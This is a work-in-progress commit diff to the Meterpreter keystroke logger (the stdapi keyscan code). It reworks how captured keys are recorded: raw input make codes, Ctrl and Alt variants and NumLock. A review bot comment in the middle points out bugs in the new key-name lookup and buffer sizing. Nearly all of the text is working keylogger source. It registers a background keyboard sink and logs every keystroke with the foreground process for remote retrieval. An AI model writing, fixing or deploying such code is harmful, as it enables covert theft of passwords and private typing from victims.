save wip
This commit is contained in:
parent
145285c549
commit
3653169513
c/meterpreter/source/extensions/stdapi/server/ui
@ -7,14 +7,14 @@ extern HMODULE hookLibrary;
|
|||||||
extern HINSTANCE hAppInstance;
|
extern HINSTANCE hAppInstance;
|
||||||
|
|
||||||
LRESULT CALLBACK ui_keyscan_wndproc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
|
LRESULT CALLBACK ui_keyscan_wndproc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam);
|
||||||
int ui_log_key(UINT vKey);
|
INT ui_log_key(UINT vKey, USHORT mCode, USHORT Flags);
|
||||||
int ui_resolve_raw_api();
|
INT ui_resolve_raw_api();
|
||||||
|
|
||||||
const char *c0_ascii[] = {
|
const WCHAR *c0[] = {
|
||||||
"^@", "^A", "^B", "^C", "^D", "^E", "^F", "^G", "^H", "^I",
|
L"^@", L"^A", L"^B", L"^C", L"^D", L"^E", L"^F", L"^G", L"^H", L"^I",
|
||||||
"^J", "^K", "^L", "^M", "^N", "^O", "^P", "^Q", "^R", "^S",
|
L"^J", L"^K", L"^L", L"^M", L"^N", L"^O", L"^P", L"^Q", L"^R", L"^S",
|
||||||
"^T", "^U", "^V", "^W", "^X", "^Y", "^Z", "^[", "^\\", "^]",
|
L"^T", L"^U", L"^V", L"^W", L"^X", L"^Y", L"^Z", L"^[", L"^\\", L"^]",
|
||||||
"^^", "^-"
|
L"^^", L"^-"
|
||||||
};
|
};
|
||||||
|
|
||||||
/*
|
/*
|
||||||
@ -70,7 +70,7 @@ WCHAR *keyscan_buf = NULL;
|
|||||||
size_t idx = 0;
|
size_t idx = 0;
|
||||||
WCHAR active_image[MAX_PATH] = L"Logging started";
|
WCHAR active_image[MAX_PATH] = L"Logging started";
|
||||||
WCHAR prev_active_image[MAX_PATH] = { 0 };
|
WCHAR prev_active_image[MAX_PATH] = { 0 };
|
||||||
|
DWORD dwThreadId;
|
||||||
/*
|
/*
|
||||||
* needed for process enumeration
|
* needed for process enumeration
|
||||||
*/
|
*/
|
||||||
@ -78,11 +78,11 @@ WCHAR prev_active_image[MAX_PATH] = { 0 };
|
|||||||
typedef struct {
|
typedef struct {
|
||||||
DWORD ppid;
|
DWORD ppid;
|
||||||
DWORD cpid;
|
DWORD cpid;
|
||||||
} wndinfo;
|
} WNDINFO;
|
||||||
|
|
||||||
|
|
||||||
BOOL CALLBACK ecw_callback(HWND hWnd, LPARAM lp) {
|
BOOL CALLBACK ecw_callback(HWND hWnd, LPARAM lp) {
|
||||||
wndinfo* info = (wndinfo*)lp;
|
WNDINFO* info = (WNDINFO*)lp;
|
||||||
DWORD pid = 0;
|
DWORD pid = 0;
|
||||||
GetWindowThreadProcessId(hWnd, &pid);
|
GetWindowThreadProcessId(hWnd, &pid);
|
||||||
if (pid != info->ppid) info->cpid = pid;
|
if (pid != info->ppid) info->cpid = pid;
|
||||||
@ -164,8 +164,8 @@ LRESULT CALLBACK ui_keyscan_wndproc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM l
|
|||||||
{
|
{
|
||||||
// register raw input device
|
// register raw input device
|
||||||
case WM_CREATE:
|
case WM_CREATE:
|
||||||
rid.usUsagePage = 0x01;
|
rid.usUsagePage = 0x01; // Generic Desktop Controls
|
||||||
rid.usUsage = 0x06;
|
rid.usUsage = 0x06; // Keyboard
|
||||||
rid.dwFlags = RIDEV_INPUTSINK;
|
rid.dwFlags = RIDEV_INPUTSINK;
|
||||||
rid.hwndTarget = hwnd;
|
rid.hwndTarget = hwnd;
|
||||||
|
|
||||||
@ -189,7 +189,7 @@ LRESULT CALLBACK ui_keyscan_wndproc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM l
|
|||||||
if(buffer->header.dwType == RIM_TYPEKEYBOARD
|
if(buffer->header.dwType == RIM_TYPEKEYBOARD
|
||||||
&& buffer->data.keyboard.Message == WM_KEYDOWN)
|
&& buffer->data.keyboard.Message == WM_KEYDOWN)
|
||||||
{
|
{
|
||||||
if(ui_log_key(buffer->data.keyboard.VKey) == -1)
|
if(ui_log_key(buffer->data.keyboard.VKey, buffer->data.keyboard.MakeCode, buffer->data.keyboard.Flags) == -1)
|
||||||
DestroyWindow(hwnd);
|
DestroyWindow(hwnd);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -309,17 +309,20 @@ DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request)
|
|||||||
* log keystrokes
|
* log keystrokes
|
||||||
*/
|
*/
|
||||||
|
|
||||||
int ui_log_key(UINT vKey)
|
int ui_log_key(UINT vKey, USHORT mCode, USHORT Flags)
|
||||||
{
|
{
|
||||||
BYTE lpKeyboard[256];
|
BYTE lpKeyboard[256];
|
||||||
WCHAR kb[16] = { 0 };
|
WCHAR kb[16] = { 0 };
|
||||||
HWND foreground_wnd;
|
HWND foreground_wnd;
|
||||||
HANDLE active_proc;
|
HANDLE active_proc;
|
||||||
SYSTEMTIME st;
|
SYSTEMTIME st;
|
||||||
wndinfo info = { 0 };
|
WNDINFO info = { 0 };
|
||||||
DWORD mpsz = MAX_PATH;
|
DWORD mpsz = MAX_PATH;
|
||||||
WCHAR date_s[256] = { 0 };
|
WCHAR date_s[256] = { 0 };
|
||||||
WCHAR time_s[256] = { 0 };
|
WCHAR time_s[256] = { 0 };
|
||||||
|
WCHAR gknt_buf[256] = { 0 };
|
||||||
|
const bool isE0 = ((Flags & RI_KEY_E0) != 0);
|
||||||
|
const bool isE1 = ((Flags & RI_KEY_E1) != 0);
|
||||||
|
|
||||||
GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); GetKeyState(VK_NUMLOCK);
|
GetKeyState(VK_CAPITAL); GetKeyState(VK_SCROLL); GetKeyState(VK_NUMLOCK);
|
||||||
GetKeyboardState(lpKeyboard);
|
GetKeyboardState(lpKeyboard);
|
||||||
@ -357,6 +360,10 @@ int ui_log_key(UINT vKey)
|
|||||||
CloseHandle(active_proc);
|
CloseHandle(active_proc);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// needed for some wonky cases
|
||||||
|
UINT key = (mCode << 16) | (isE0 << 24);
|
||||||
|
BOOL ctrl_is_down = (1 << 15) & (GetAsyncKeyState(VK_CONTROL));
|
||||||
|
|
||||||
switch (vKey)
|
switch (vKey)
|
||||||
{
|
{
|
||||||
case VK_BACK:
|
case VK_BACK:
|
||||||
@ -365,29 +372,33 @@ int ui_log_key(UINT vKey)
|
|||||||
case VK_RETURN:
|
case VK_RETURN:
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<CR>\r\n");
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<CR>\r\n");
|
||||||
break;
|
break;
|
||||||
case VK_SHIFT:
|
|
||||||
break;
|
|
||||||
case VK_LCONTROL:
|
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<Ctrl>");
|
|
||||||
break;
|
|
||||||
case VK_MENU:
|
case VK_MENU:
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<Alt>");
|
if (isE0)
|
||||||
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<RAlt>");
|
||||||
|
else
|
||||||
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<LAlt>");
|
||||||
break;
|
break;
|
||||||
case VK_TAB:
|
case VK_TAB:
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<Tab>");
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<Tab>");
|
||||||
break;
|
break;
|
||||||
|
case VK_NUMLOCK: // pause/break and numlock both send the same message
|
||||||
|
key = (MapVirtualKey(vKey, MAPVK_VK_TO_VSC) | 0x100);
|
||||||
|
if (GetKeyNameTextW((LONG)key, (LPWSTR)gknt_buf, mpsz))
|
||||||
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<%ls>", gknt_buf);
|
||||||
|
break;
|
||||||
default:
|
default:
|
||||||
if (ToUnicodeEx(vKey, MapVirtualKey(vKey, 0), lpKeyboard, kb, 16, 0, NULL) == 1)
|
if (ctrl_is_down && (vKey != VK_CONTROL))
|
||||||
{
|
{
|
||||||
if ((UINT)vKey <= 0x1f)
|
if (GetKeyNameTextW((LONG)key, (LPWSTR)gknt_buf, mpsz))
|
||||||
{
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<^%ls>", gknt_buf);
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"%ls", c0_ascii[vKey]);
|
}
|
||||||
return 0;
|
else if (ToUnicodeEx(vKey, mCode, lpKeyboard, kb, 16, 0, NULL) == 1)
|
||||||
}
|
{
|
||||||
else
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"%ls", kb);
|
||||||
{
|
}
|
||||||
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"%ls", kb);
|
else if (GetKeyNameTextW((LONG)key, (LPWSTR)gknt_buf, mpsz))
|
||||||
}
|
{
|
||||||
|
idx += _snwprintf(keyscan_buf + idx, KEYBUFSIZE, L"<%ls>", gknt_buf);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
return 0;
|
return 0;
|
||||||
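Review bot: In the new `case VK_NUMLOCK:` branch the value handed to GetKeyNameTextW is not in lParam layout: `key = (MapVirtualKey(vKey, MAPVK_VK_TO_VSC) | 0x100);` leaves the scan code in the low byte, while GetKeyNameText reads the scan code from bits 16–23 and the extended flag from bit 24 (exactly how `key` is built a few lines earlier as `(mCode << 16) | (isE0 << 24)`), so the lookup will most likely return nothing and the NumLock press is silently dropped; it should be `key = ((MapVirtualKey(vKey, MAPVK_VK_TO_VSC) | 0x100) << 16);`. The three GetKeyNameTextW calls also pass `mpsz` (initialised to MAX_PATH, i.e. 260) as the capacity of `gknt_buf`, which holds only 256 WCHARs, and if `mpsz` is handed by pointer to the process-image query above this hunk it may no longer even hold MAX_PATH here — pass `sizeof(gknt_buf) / sizeof(gknt_buf[0])` instead. `isE1` is computed but never read in the lines shown (the E1 prefix is what separates Pause from NumLock, which the comment on the VK_NUMLOCK case alludes to), and `const bool` needs <stdbool.h> if this unit is compiled as C; `BOOL` would match `ctrl_is_down`. ui_log_key is split across several hunks and its closing brace is outside what is shown.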
|
@ -10,6 +10,8 @@
|
|||||||
#define RIM_TYPEHID 2
|
#define RIM_TYPEHID 2
|
||||||
|
|
||||||
#define RIDEV_INPUTSINK 0x00000100
|
#define RIDEV_INPUTSINK 0x00000100
|
||||||
|
#define RI_KEY_E0 2
|
||||||
|
#define RI_KEY_E1 4
|
||||||
|
|
||||||
/*
|
/*
|
||||||
* Raw Input Messages.
|
* Raw Input Messages.
|
||||||
@ -150,4 +152,4 @@ typedef BOOL (WINAPI *f_RegisterRawInputDevices)(
|
|||||||
__in UINT cbSize);
|
__in UINT cbSize);
|
||||||
|
|
||||||
typedef DWORD (WINAPI *f_QueryFullProcessImageNameW) (HANDLE, DWORD, LPTSTR, PDWORD);
|
typedef DWORD (WINAPI *f_QueryFullProcessImageNameW) (HANDLE, DWORD, LPTSTR, PDWORD);
|
||||||
typedef DWORD (WINAPI *f_GetProcessImageFileNameW) (HANDLE, LPTSTR, DWORD);
|
typedef DWORD (WINAPI *f_GetProcessImageFileNameW) (HANDLE, LPTSTR, DWORD);
|